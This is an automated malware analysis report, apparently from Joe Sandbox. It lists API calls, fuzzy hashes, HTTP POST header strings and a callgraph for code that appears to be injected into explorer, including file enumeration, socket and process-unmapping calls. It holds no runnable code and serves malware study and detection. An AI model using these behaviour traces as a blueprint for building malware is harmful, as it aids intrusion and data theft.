                            • lstrcmpiW.KERNEL32 ref: 003A19DE
                            • wsprintfW.USER32 ref: 003A19F4
                            • wsprintfW.USER32 ref: 003A1A39
                            • wsprintfW.USER32 ref: 003A1A4E
                            • RtlZeroMemory.NTDLL(?,00000105), ref: 003A1A79
                            • lstrcat.KERNEL32(?,00000000), ref: 003A1A88
                            • StrToIntA.SHLWAPI(00000000,00000001), ref: 003A1AAF
                            • PathMatchSpecW.SHLWAPI(?,00000000), ref: 003A1AD1
                            • FindNextFileW.KERNEL32(?,?), ref: 003A1B0F
                            • FindClose.KERNEL32(?), ref: 003A1B1E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: wsprintf$Find$FileHeap$AllocateCloseFirstMatchMemoryNextPathProcessSpecZerolstrcatlstrcmpi
                            • String ID: %s\$%s\%s$*.*
                            • API String ID: 1508016061-3943360074
                            • Opcode ID: 9660f01d5aa3f4cca66d4ccf39be2de6dc56073e05f6bd3b320fdb996b9538bb
                            • Instruction ID: 8064d30b85e2884bdbf7ecd33b10acdf58e55015009ec1abe96589a017e8b478
                            • Opcode Fuzzy Hash: 9660f01d5aa3f4cca66d4ccf39be2de6dc56073e05f6bd3b320fdb996b9538bb
                            • Instruction Fuzzy Hash: 4A51F4316043049FD712EF64DC49BAB77EDEF86309F010A18F9559B292EB749C44CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 003A1000: GetProcessHeap.KERNEL32(00000008,?,003A129C,?,?,00000001,00000000,?), ref: 003A1003
                              • Part of subcall function 003A1000: RtlAllocateHeap.NTDLL(00000000), ref: 003A100A
                            • wsprintfW.USER32 ref: 003A1999
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 003A19A8
                            • lstrcmpiW.KERNEL32 ref: 003A19DE
                            • wsprintfW.USER32 ref: 003A19F4
                            • wsprintfW.USER32 ref: 003A1A39
                            • wsprintfW.USER32 ref: 003A1A4E
                            • RtlZeroMemory.NTDLL(?,00000105), ref: 003A1A79
                            • lstrcat.KERNEL32(?,00000000), ref: 003A1A88
                            • StrToIntA.SHLWAPI(00000000,00000001), ref: 003A1AAF
                            • PathMatchSpecW.SHLWAPI(?,00000000), ref: 003A1AD1
                            • FindNextFileW.KERNEL32(?,?), ref: 003A1B0F
                            • FindClose.KERNEL32(?), ref: 003A1B1E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: wsprintf$Find$FileHeap$AllocateCloseFirstMatchMemoryNextPathProcessSpecZerolstrcatlstrcmpi
                            • String ID: %s\%s$*.*
                            • API String ID: 1508016061-3420517325
                            • Opcode ID: d9a2e34e081a45039ff08a1149964c35e7e918d04ae94836bb115c5f359bb7a2
                            • Instruction ID: 5bd5fcc48281e684799225ebce7f9b8de857ebfbb13d056c73ca97421cbd7f8d
                            • Opcode Fuzzy Hash: d9a2e34e081a45039ff08a1149964c35e7e918d04ae94836bb115c5f359bb7a2
                            • Instruction Fuzzy Hash: A121B531605304ABC711AF68DC49AAFBBECEF85319F400B2DF995D7251EB789904CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 003A2012
                            • FileTimeToLocalFileTime.KERNEL32(?,?,?,?), ref: 003A202A
                            • FileTimeToDosDateTime.KERNEL32(?,?), ref: 003A2039
                            • FindClose.KERNEL32(00000000,?,?,?), ref: 003A2040
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: FileTime$Find$CloseDateFirstLocal
                            • String ID:
                            • API String ID: 2659516521-0
                            • Opcode ID: 12fd3a70741e370e9ba081c9a80957e28facb330fb09aa5853bedfa53a1ec55c
                            • Instruction ID: ab228a99a09b165ffccbb8be98088d97a8fef10bce8f1ac060e9c9e1a0f779b6
                            • Opcode Fuzzy Hash: 12fd3a70741e370e9ba081c9a80957e28facb330fb09aa5853bedfa53a1ec55c
                            • Instruction Fuzzy Hash: 94F03777401518BBC711A7A8EC4CEDF77BCDB89325F000766F619D3150EA3496458BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,003A9162,?,?,?,00000001), ref: 003A8D40
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003A8D49
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 0805c7772582da9ecfa7305a81ed094ffed9a654caf4c98452c8b020346ef116
                            • Instruction ID: ded899c7636a35ecaf0a935c7e6abead7405347636d03d51051d043138c26aa0
                            • Opcode Fuzzy Hash: 0805c7772582da9ecfa7305a81ed094ffed9a654caf4c98452c8b020346ef116
                            • Instruction Fuzzy Hash: 3BB09231049608ABCA823B91EC49B883F2EEB0875EF000110F70D480708B6255508AD2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlDecodePointer.NTDLL ref: 003A7E74
                            • _free.LIBCMT ref: 003A7E8D
                              • Part of subcall function 003A8840: HeapFree.KERNEL32(00000000,00000000,?,003A7C1B,00000000,003A9235,003AAE02,00000001,?,003A1F80,00000001,00000000,00000000,00000000), ref: 003A8854
                              • Part of subcall function 003A8840: GetLastError.KERNEL32(00000000,?,003A7C1B,00000000,003A9235,003AAE02,00000001,?,003A1F80,00000001,00000000,00000000,00000000), ref: 003A8866
                            • _free.LIBCMT ref: 003A7EA0
                            • _free.LIBCMT ref: 003A7EBE
                            • _free.LIBCMT ref: 003A7ED0
                            • _free.LIBCMT ref: 003A7EE1
                            • _free.LIBCMT ref: 003A7EEC
                            • _free.LIBCMT ref: 003A7F10
                            • RtlEncodePointer.NTDLL(0075C1C8), ref: 003A7F17
                            • _free.LIBCMT ref: 003A7F2C
                            • _free.LIBCMT ref: 003A7F42
                            • _free.LIBCMT ref: 003A7F6A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                            • String ID: *u
                            • API String ID: 3064303923-2872433927
                            • Opcode ID: 2bdd75ced67165a0147d209b9bc6e141839e91fc79a1c69d2e0fb3ec57bbd1f8
                            • Instruction ID: b52674c63730e5cbb21cc7cfd6f32cee7e64e765f126ffbc7ddbe27da73d13cd
                            • Opcode Fuzzy Hash: 2bdd75ced67165a0147d209b9bc6e141839e91fc79a1c69d2e0fb3ec57bbd1f8
                            • Instruction Fuzzy Hash: BF21B537D092208FC7236F2DFC81956776CF717728B26023AE6049B2A1CF395C408B94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 003A1000: GetProcessHeap.KERNEL32(00000008,?,003A129C,?,?,00000001,00000000,?), ref: 003A1003
                              • Part of subcall function 003A1000: RtlAllocateHeap.NTDLL(00000000), ref: 003A100A
                              • Part of subcall function 003A106C: lstrlen.KERNEL32(00772C2E,?,00000000,00000000,003A1497,772D81D0,00772C2E,00000000), ref: 003A1074
                              • Part of subcall function 003A106C: MultiByteToWideChar.KERNEL32(00000000,00000000,00772C2E,00000001,00000000,00000000), ref: 003A1086
                              • Part of subcall function 003A130E: RtlZeroMemory.NTDLL(?,00000018), ref: 003A1320
                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 003A14F3
                            • wsprintfW.USER32 ref: 003A162C
                            • wsprintfW.USER32 ref: 003A1697
                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 003A1761
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST$`,w
                            • API String ID: 4204651544-3503094735
                            • Opcode ID: 4742364955506f861e513249a2c8fd7397ed25ec32d03623e559f5883d186e69
                            • Instruction ID: d247ac90bc9f75994afd580c77d88b16978e967cf6344aaa3f0c7969e421200c
                            • Opcode Fuzzy Hash: 4742364955506f861e513249a2c8fd7397ed25ec32d03623e559f5883d186e69
                            • Instruction Fuzzy Hash: 43A18A71608300AFD712DF68D884A2FBBEDEB8A344F14092DFA85DB261DA75DD048B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ___crtIsPackagedApp.LIBCMT ref: 003A7D9A
                            • AreFileApisANSI.KERNEL32(?,00000109,00000000,?,003B35B5,00000008,00000000,00000000,?,003B354C,?,?,?,?,00000008,?), ref: 003A7DA3
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000109,00000000,?,003B35B5,00000008,00000000,00000000,?,003B354C), ref: 003A7DBD
                            • GetLastError.KERNEL32(?,003B35B5,00000008,00000000,00000000,?,003B354C,?,?,?,?,00000008,?,00000000,003BBFF0,00000014), ref: 003A7DCA
                            • __dosmaperr.LIBCMT ref: 003A7DD1
                              • Part of subcall function 003A9230: __getptd_noexit.LIBCMT ref: 003A9230
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: ApisByteCharErrorFileLastMultiPackagedWide___crt__dosmaperr__getptd_noexit
                            • String ID:
                            • API String ID: 1083238821-0
                            • Opcode ID: 122462f1a86c4e8ccd070631379cd67c98793538ffc3c44517ffaf424468c96d
                            • Instruction ID: ee5b165601171b57c705338c18ebdcc906b4f230334daa7dd88c425ba93999fa
                            • Opcode Fuzzy Hash: 122462f1a86c4e8ccd070631379cd67c98793538ffc3c44517ffaf424468c96d
                            • Instruction Fuzzy Hash: 2511C472608216BFEB137FB09C85FBA77ACEF26365F214A25F951D9191EA30CC4046A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 003A1FA2: PathCombineW.SHLWAPI(?,?,?), ref: 003A1FC4
                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003A2092
                            • CloseHandle.KERNEL32(00000000), ref: 003A209E
                            • _memset.LIBCMT ref: 003A20B8
                              • Part of subcall function 003A1FFD: FindFirstFileW.KERNEL32(?,?), ref: 003A2012
                              • Part of subcall function 003A1FFD: FileTimeToLocalFileTime.KERNEL32(?,?,?,?), ref: 003A202A
                              • Part of subcall function 003A1FFD: FileTimeToDosDateTime.KERNEL32(?,?), ref: 003A2039
                              • Part of subcall function 003A1FFD: FindClose.KERNEL32(00000000,?,?,?), ref: 003A2040
                              • Part of subcall function 003A1F54: lstrlenW.KERNEL32 ref: 003A1F5E
                              • Part of subcall function 003A1F54: _malloc.LIBCMT ref: 003A1F7B
                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?), ref: 003A2102
                            • _malloc.LIBCMT ref: 003A2110
                              • Part of subcall function 003AAD7B: __FF_MSGBANNER.LIBCMT ref: 003AAD92
                              • Part of subcall function 003AAD7B: __NMSG_WRITE.LIBCMT ref: 003AAD99
                              • Part of subcall function 003AAD7B: RtlAllocateHeap.NTDLL(00750000,00000000,00000001), ref: 003AADBE
                            • ReadFile.KERNEL32(00000000,00000000,0000FFFF,?,00000000), ref: 003A2129
                            • _free.LIBCMT ref: 003A214E
                            • CloseHandle.KERNEL32(00000000), ref: 003A2155
                            • _free.LIBCMT ref: 003A216B
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: File$Time$Close$CreateFindHandle_free_malloc$AllocateCombineDateFirstHeapLocalPathRead_memsetlstrlen
                            • String ID:
                            • API String ID: 2641817564-0
                            • Opcode ID: e77bd49733eeca369644548fc3e8c2ded120e7a417ee4291e959285d4575c147
                            • Instruction ID: 0832a2728ec7d1de7eaa3a44f8c03b80839e1814ef17623ef13199ec4cfc2c65
                            • Opcode Fuzzy Hash: e77bd49733eeca369644548fc3e8c2ded120e7a417ee4291e959285d4575c147
                            • Instruction Fuzzy Hash: 1031B672604341ABC722EB29DC85E5F77ACEFC6714F004A1CFA59D7191EA34D905CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __init_pointers.LIBCMT ref: 003A7CDD
                              • Part of subcall function 003A803C: RtlEncodePointer.NTDLL(00000000), ref: 003A803F
                              • Part of subcall function 003A803C: __initp_misc_winsig.LIBCMT ref: 003A805A
                              • Part of subcall function 003A803C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003A8A94
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003A8AA8
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003A8ABB
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003A8ACE
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003A8AE1
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003A8AF4
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003A8B07
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003A8B1A
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003A8B2D
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003A8B40
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003A8B53
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003A8B66
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003A8B79
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003A8B8C
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003A8B9F
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003A8BB2
                            • __mtinitlocks.LIBCMT ref: 003A7CE2
                            • __mtterm.LIBCMT ref: 003A7CEB
                              • Part of subcall function 003A7D53: RtlDeleteCriticalSection.NTDLL ref: 003AA0B9
                              • Part of subcall function 003A7D53: _free.LIBCMT ref: 003AA0C0
                              • Part of subcall function 003A7D53: RtlDeleteCriticalSection.NTDLL( ;), ref: 003AA0E2
                            • __calloc_crt.LIBCMT ref: 003A7D10
                            • __initptd.LIBCMT ref: 003A7D32
                            • GetCurrentThreadId.KERNEL32 ref: 003A7D39
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                            • String ID:
                            • API String ID: 3567560977-0
                            • Opcode ID: f09108a4ddc39b99b76ee704ce8f84054092a418f29d374a88bb95036b6dc003
                            • Instruction ID: 64a58510b882f9e28cba7e7bd62c95eed47622b09bd37c585a974d267e616f89
                            • Opcode Fuzzy Hash: f09108a4ddc39b99b76ee704ce8f84054092a418f29d374a88bb95036b6dc003
                            • Instruction Fuzzy Hash: 98F0B43211D7112AE22B7B747C4366B3789EF53774F21072AF8A9CC0E1FF2088428291
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: _free_mallocwcsncpy
                            • String ID: .z%02d
                            • API String ID: 3842812274-724465191
                            • Opcode ID: fb072c29455a890c321215f764381bdc7cbeac74697f859277a26630e67abdc3
                            • Instruction ID: 356ec1668fda8426629f4cddd7fd0e79aa82e78d350820d53da04b437a07edfa
                            • Opcode Fuzzy Hash: fb072c29455a890c321215f764381bdc7cbeac74697f859277a26630e67abdc3
                            • Instruction Fuzzy Hash: 591182B2904218BBCB029F58DC85EBEB76CEF06724F504159FD029B201DB36AA1096F0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: _free_mallocstrncpy
                            • String ID: .z%02u
                            • API String ID: 854628082-1100895957
                            • Opcode ID: a38c09427899468a074f9bbf0a07e5d78b36cab22212c14cffb5b8b9b6a55b62
                            • Instruction ID: 8529c7b1740d01009897bc6f7e2fe4090b87a8a7375c767b74ac9638bde33714
                            • Opcode Fuzzy Hash: a38c09427899468a074f9bbf0a07e5d78b36cab22212c14cffb5b8b9b6a55b62
                            • Instruction Fuzzy Hash: 3F014732501B24AFDB235F58CC45D7BBBAEEF46B14B40082DFD569B611D731AE1086B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                            • String ID:
                            • API String ID: 1559183368-0
                            • Opcode ID: d4eb1a777f878832786e557e6d3bf7cead3d85c675fbd5e9f08223bff75cf05c
                            • Instruction ID: f38130a9b82454d1652b8125894e491d3858d4ea039c40bfcd07aa33928e2265
                            • Opcode Fuzzy Hash: d4eb1a777f878832786e557e6d3bf7cead3d85c675fbd5e9f08223bff75cf05c
                            • Instruction Fuzzy Hash: 1651D330A006059FDB269FADC8816EF77B5EF41328F258B29FA359AAD0D7709D51CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _malloc.LIBCMT ref: 003AAE19
                              • Part of subcall function 003AAD7B: __FF_MSGBANNER.LIBCMT ref: 003AAD92
                              • Part of subcall function 003AAD7B: __NMSG_WRITE.LIBCMT ref: 003AAD99
                              • Part of subcall function 003AAD7B: RtlAllocateHeap.NTDLL(00750000,00000000,00000001), ref: 003AADBE
                            • _free.LIBCMT ref: 003AAE2C
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: AllocateHeap_free_malloc
                            • String ID:
                            • API String ID: 1020059152-0
                            • Opcode ID: b56c5ac18bd0c9af61cea763005f6e43662b1419cd7209d1ec2761bbe04dd0a3
                            • Instruction ID: 4b73043b9d915e977ace49b44ca209b5aa845c28d12a0c0ee60cb5833d85eff6
                            • Opcode Fuzzy Hash: b56c5ac18bd0c9af61cea763005f6e43662b1419cd7209d1ec2761bbe04dd0a3
                            • Instruction Fuzzy Hash: C8117333905A15AACB233FB4AC05B9B379CDF1A364F114926F9499E151DF358D80C6E2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: g!:$g!:$1:
                            • API String ID: 0-3433116473
                            • Opcode ID: bf06aed01965486eb133facebbb277dbe31ac982ec59f1c455618fd091d21965
                            • Instruction ID: 563c495209bb14c629a6d3b6ad98d5b8dd1e4fdb1382ffca783453aa221b66dc
                            • Opcode Fuzzy Hash: bf06aed01965486eb133facebbb277dbe31ac982ec59f1c455618fd091d21965
                            • Instruction Fuzzy Hash: 0AC1D474700602AFDB2ADB79C841BFAF365FF46714F104229F5699B2C1DBB0A991CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 003A7BA3: __getptd_noexit.LIBCMT ref: 003A7BA4
                              • Part of subcall function 003A7BA3: __amsg_exit.LIBCMT ref: 003A7BB1
                            • __amsg_exit.LIBCMT ref: 003A98C6
                            • __lock.LIBCMT ref: 003A98D6
                            • _free.LIBCMT ref: 003A9903
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: __amsg_exit$__getptd_noexit__lock_free
                            • String ID: *u
                            • API String ID: 3054295789-2872433927
                            • Opcode ID: 18423245145465fe76954c627d086c3d773b128fbd75a1b48e57de1c7de813d1
                            • Instruction ID: ab2112147e47134ac4e2e3793aef8b2047c05935f1e5002c0e910587f009157a
                            • Opcode Fuzzy Hash: 18423245145465fe76954c627d086c3d773b128fbd75a1b48e57de1c7de813d1
                            • Instruction Fuzzy Hash: 6011A532D05715ABCB23EF68944176EB7A8EB07B24B16021FE420B7281DB785D41CFC5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003B16F2
                            • __isleadbyte_l.LIBCMT ref: 003B1720
                            • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 003B174E
                            • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 003B1784
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 75e0797126d5ecd5d78d85e353ed05052ca2e05ffde42b00fee68e155ffe645c
                            • Instruction ID: 417038071c921076fe4ae138a8987f6ae7b3284e2697eb7dabfc2159e0e66c46
                            • Opcode Fuzzy Hash: 75e0797126d5ecd5d78d85e353ed05052ca2e05ffde42b00fee68e155ffe645c
                            • Instruction Fuzzy Hash: E431D235A0024AAFDB228F65C856BFA7BA9FF41358F564129E9148B490DB31D850DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(?,?,00000000,00000000,00000000,00772C2E,003A1CFF,?,?,00000000,?), ref: 003A17E0
                            • lstrcat.KERNEL32(00000002,00772C5B), ref: 003A1812
                            • lstrcat.KERNEL32(0000004E,?), ref: 003A182E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: lstrcat$lstrlen
                            • String ID: `,w
                            • API String ID: 751011610-1086758147
                            • Opcode ID: 3ac1d890a6882745c5ef3a690630234e60ad9c54d11c8e1318fa38464d4dc987
                            • Instruction ID: 6712bb6e4c0017a204c3ae4aa9391318f1355b91b4a1d972e82a5d148f36e622
                            • Opcode Fuzzy Hash: 3ac1d890a6882745c5ef3a690630234e60ad9c54d11c8e1318fa38464d4dc987
                            • Instruction Fuzzy Hash: 19119E766143109BC319DF18D894A6BB7E9EF89354F01062EF90A8B346EB75AC048BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction ID: 3e5fd867a656354e46ab1e2a76d88f9d6f2d77ad567edfb9df9deb09b0c40296
                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction Fuzzy Hash: 0001663240004ABBCF175E84DC018EE3F66FB1A354F8A8415FA5A58930D337CAB1AB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: _malloc$_strlenstrncpy
                            • String ID:
                            • API String ID: 4159901624-0
                            • Opcode ID: 557202e407cc92e8dca2f99fc0d8c86f3a1800c6cb2a170f016ab372054d4542
                            • Instruction ID: 9381cb082784b44d6753ae718a3c34f8463e06dee38dbf2b0a212c870802d9db
                            • Opcode Fuzzy Hash: 557202e407cc92e8dca2f99fc0d8c86f3a1800c6cb2a170f016ab372054d4542
                            • Instruction Fuzzy Hash: 5CE068B3601D327BD3022B6D4C44D0B768CEF8B3523040421F508DB201C7204D0183F1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage: 10.4%
                            Dynamic/Decrypted Code Coverage: 97.7%
                            Signature Coverage: 2.8%
                            Total number of Nodes: 353
                            Total number of Limit Nodes: 4
                            execution_graph: node/edge dump of the rendered Joe Sandbox execution graph (the graph layout itself is not recoverable from this text; only the node labels are). APIs appearing as graph nodes: GetProcessHeap, RtlAllocateHeap, HeapFree, lstrlen, lstrcat, RtlMoveMemory, RtlZeroMemory, RtlRandom, RtlGetVersion, RtlComputeCrc32, RtlExitUserThread, WSAStartup, gethostbyname, inet_ntoa, inet_addr, htons, socket, connect, send, sendto, recv, shutdown, closesocket, DnsQuery_W, DnsFree, Sleep, GetTickCount, wsprintfA, wsprintfW, CharLowerA, MultiByteToWideChar, VirtualAlloc, VirtualFree, VirtualQuery, VirtualProtect, NtUnmapViewOfSection, OpenFileMappingA, MapViewOfFile, UnmapViewOfFile, FindCloseChangeNotification, CreateThread, WaitForMultipleObjects, CloseHandle, LoadLibraryA, GetProcAddress.

                            Callgraph

                            Functions (Function_031Dxxxx) and their direct callees, as recovered from the callgraph:
                            • 031D1000 -> 031D1016
                            • 031D1016 -> 031D2947, 031D2B38, 031D106E
                            • 031D106E -> 031D2B5F, 031D2B1A, 031D2990, 031D1140, 031D297D, 031D29BC, 031D2B38
                            • 031D1140 -> 031D2ADD, 031D234D, 031D290C, 031D29BC, 031D28FF
                            • 031D234D -> 031D2B1A, 031D23C2, 031D2B38
                            • 031D23C2 -> 031D2B1A, 031D2848, 031D2A08, 031D278B, 031D2AB9, 031D27B9, 031D2B38, 031D2AEC
                            • 031D278B -> 031D29BC
                            • 031D27B9 -> 031D2AB9, 031D2B38
                            • 031D1FF6 -> 031D2ADD, 031D2B1A, 031D290C, 031D23C2, 031D29BC, 031D2B38
                            • 031D142C -> 031D1F98, 031D28D8, 031D2B1A, 031D2297, 031D1F10, 031D2B49, 031D29BC, 031D28FF, 031D2B38, 031D2AEC, 031D1FE9, 031D1F2A, 031D1F61
                            • 031D2297 -> 031D2B49, 031D2B38
                            • 031D28D8 -> 031D2B49
                            • 031D2B1A -> 031D2947
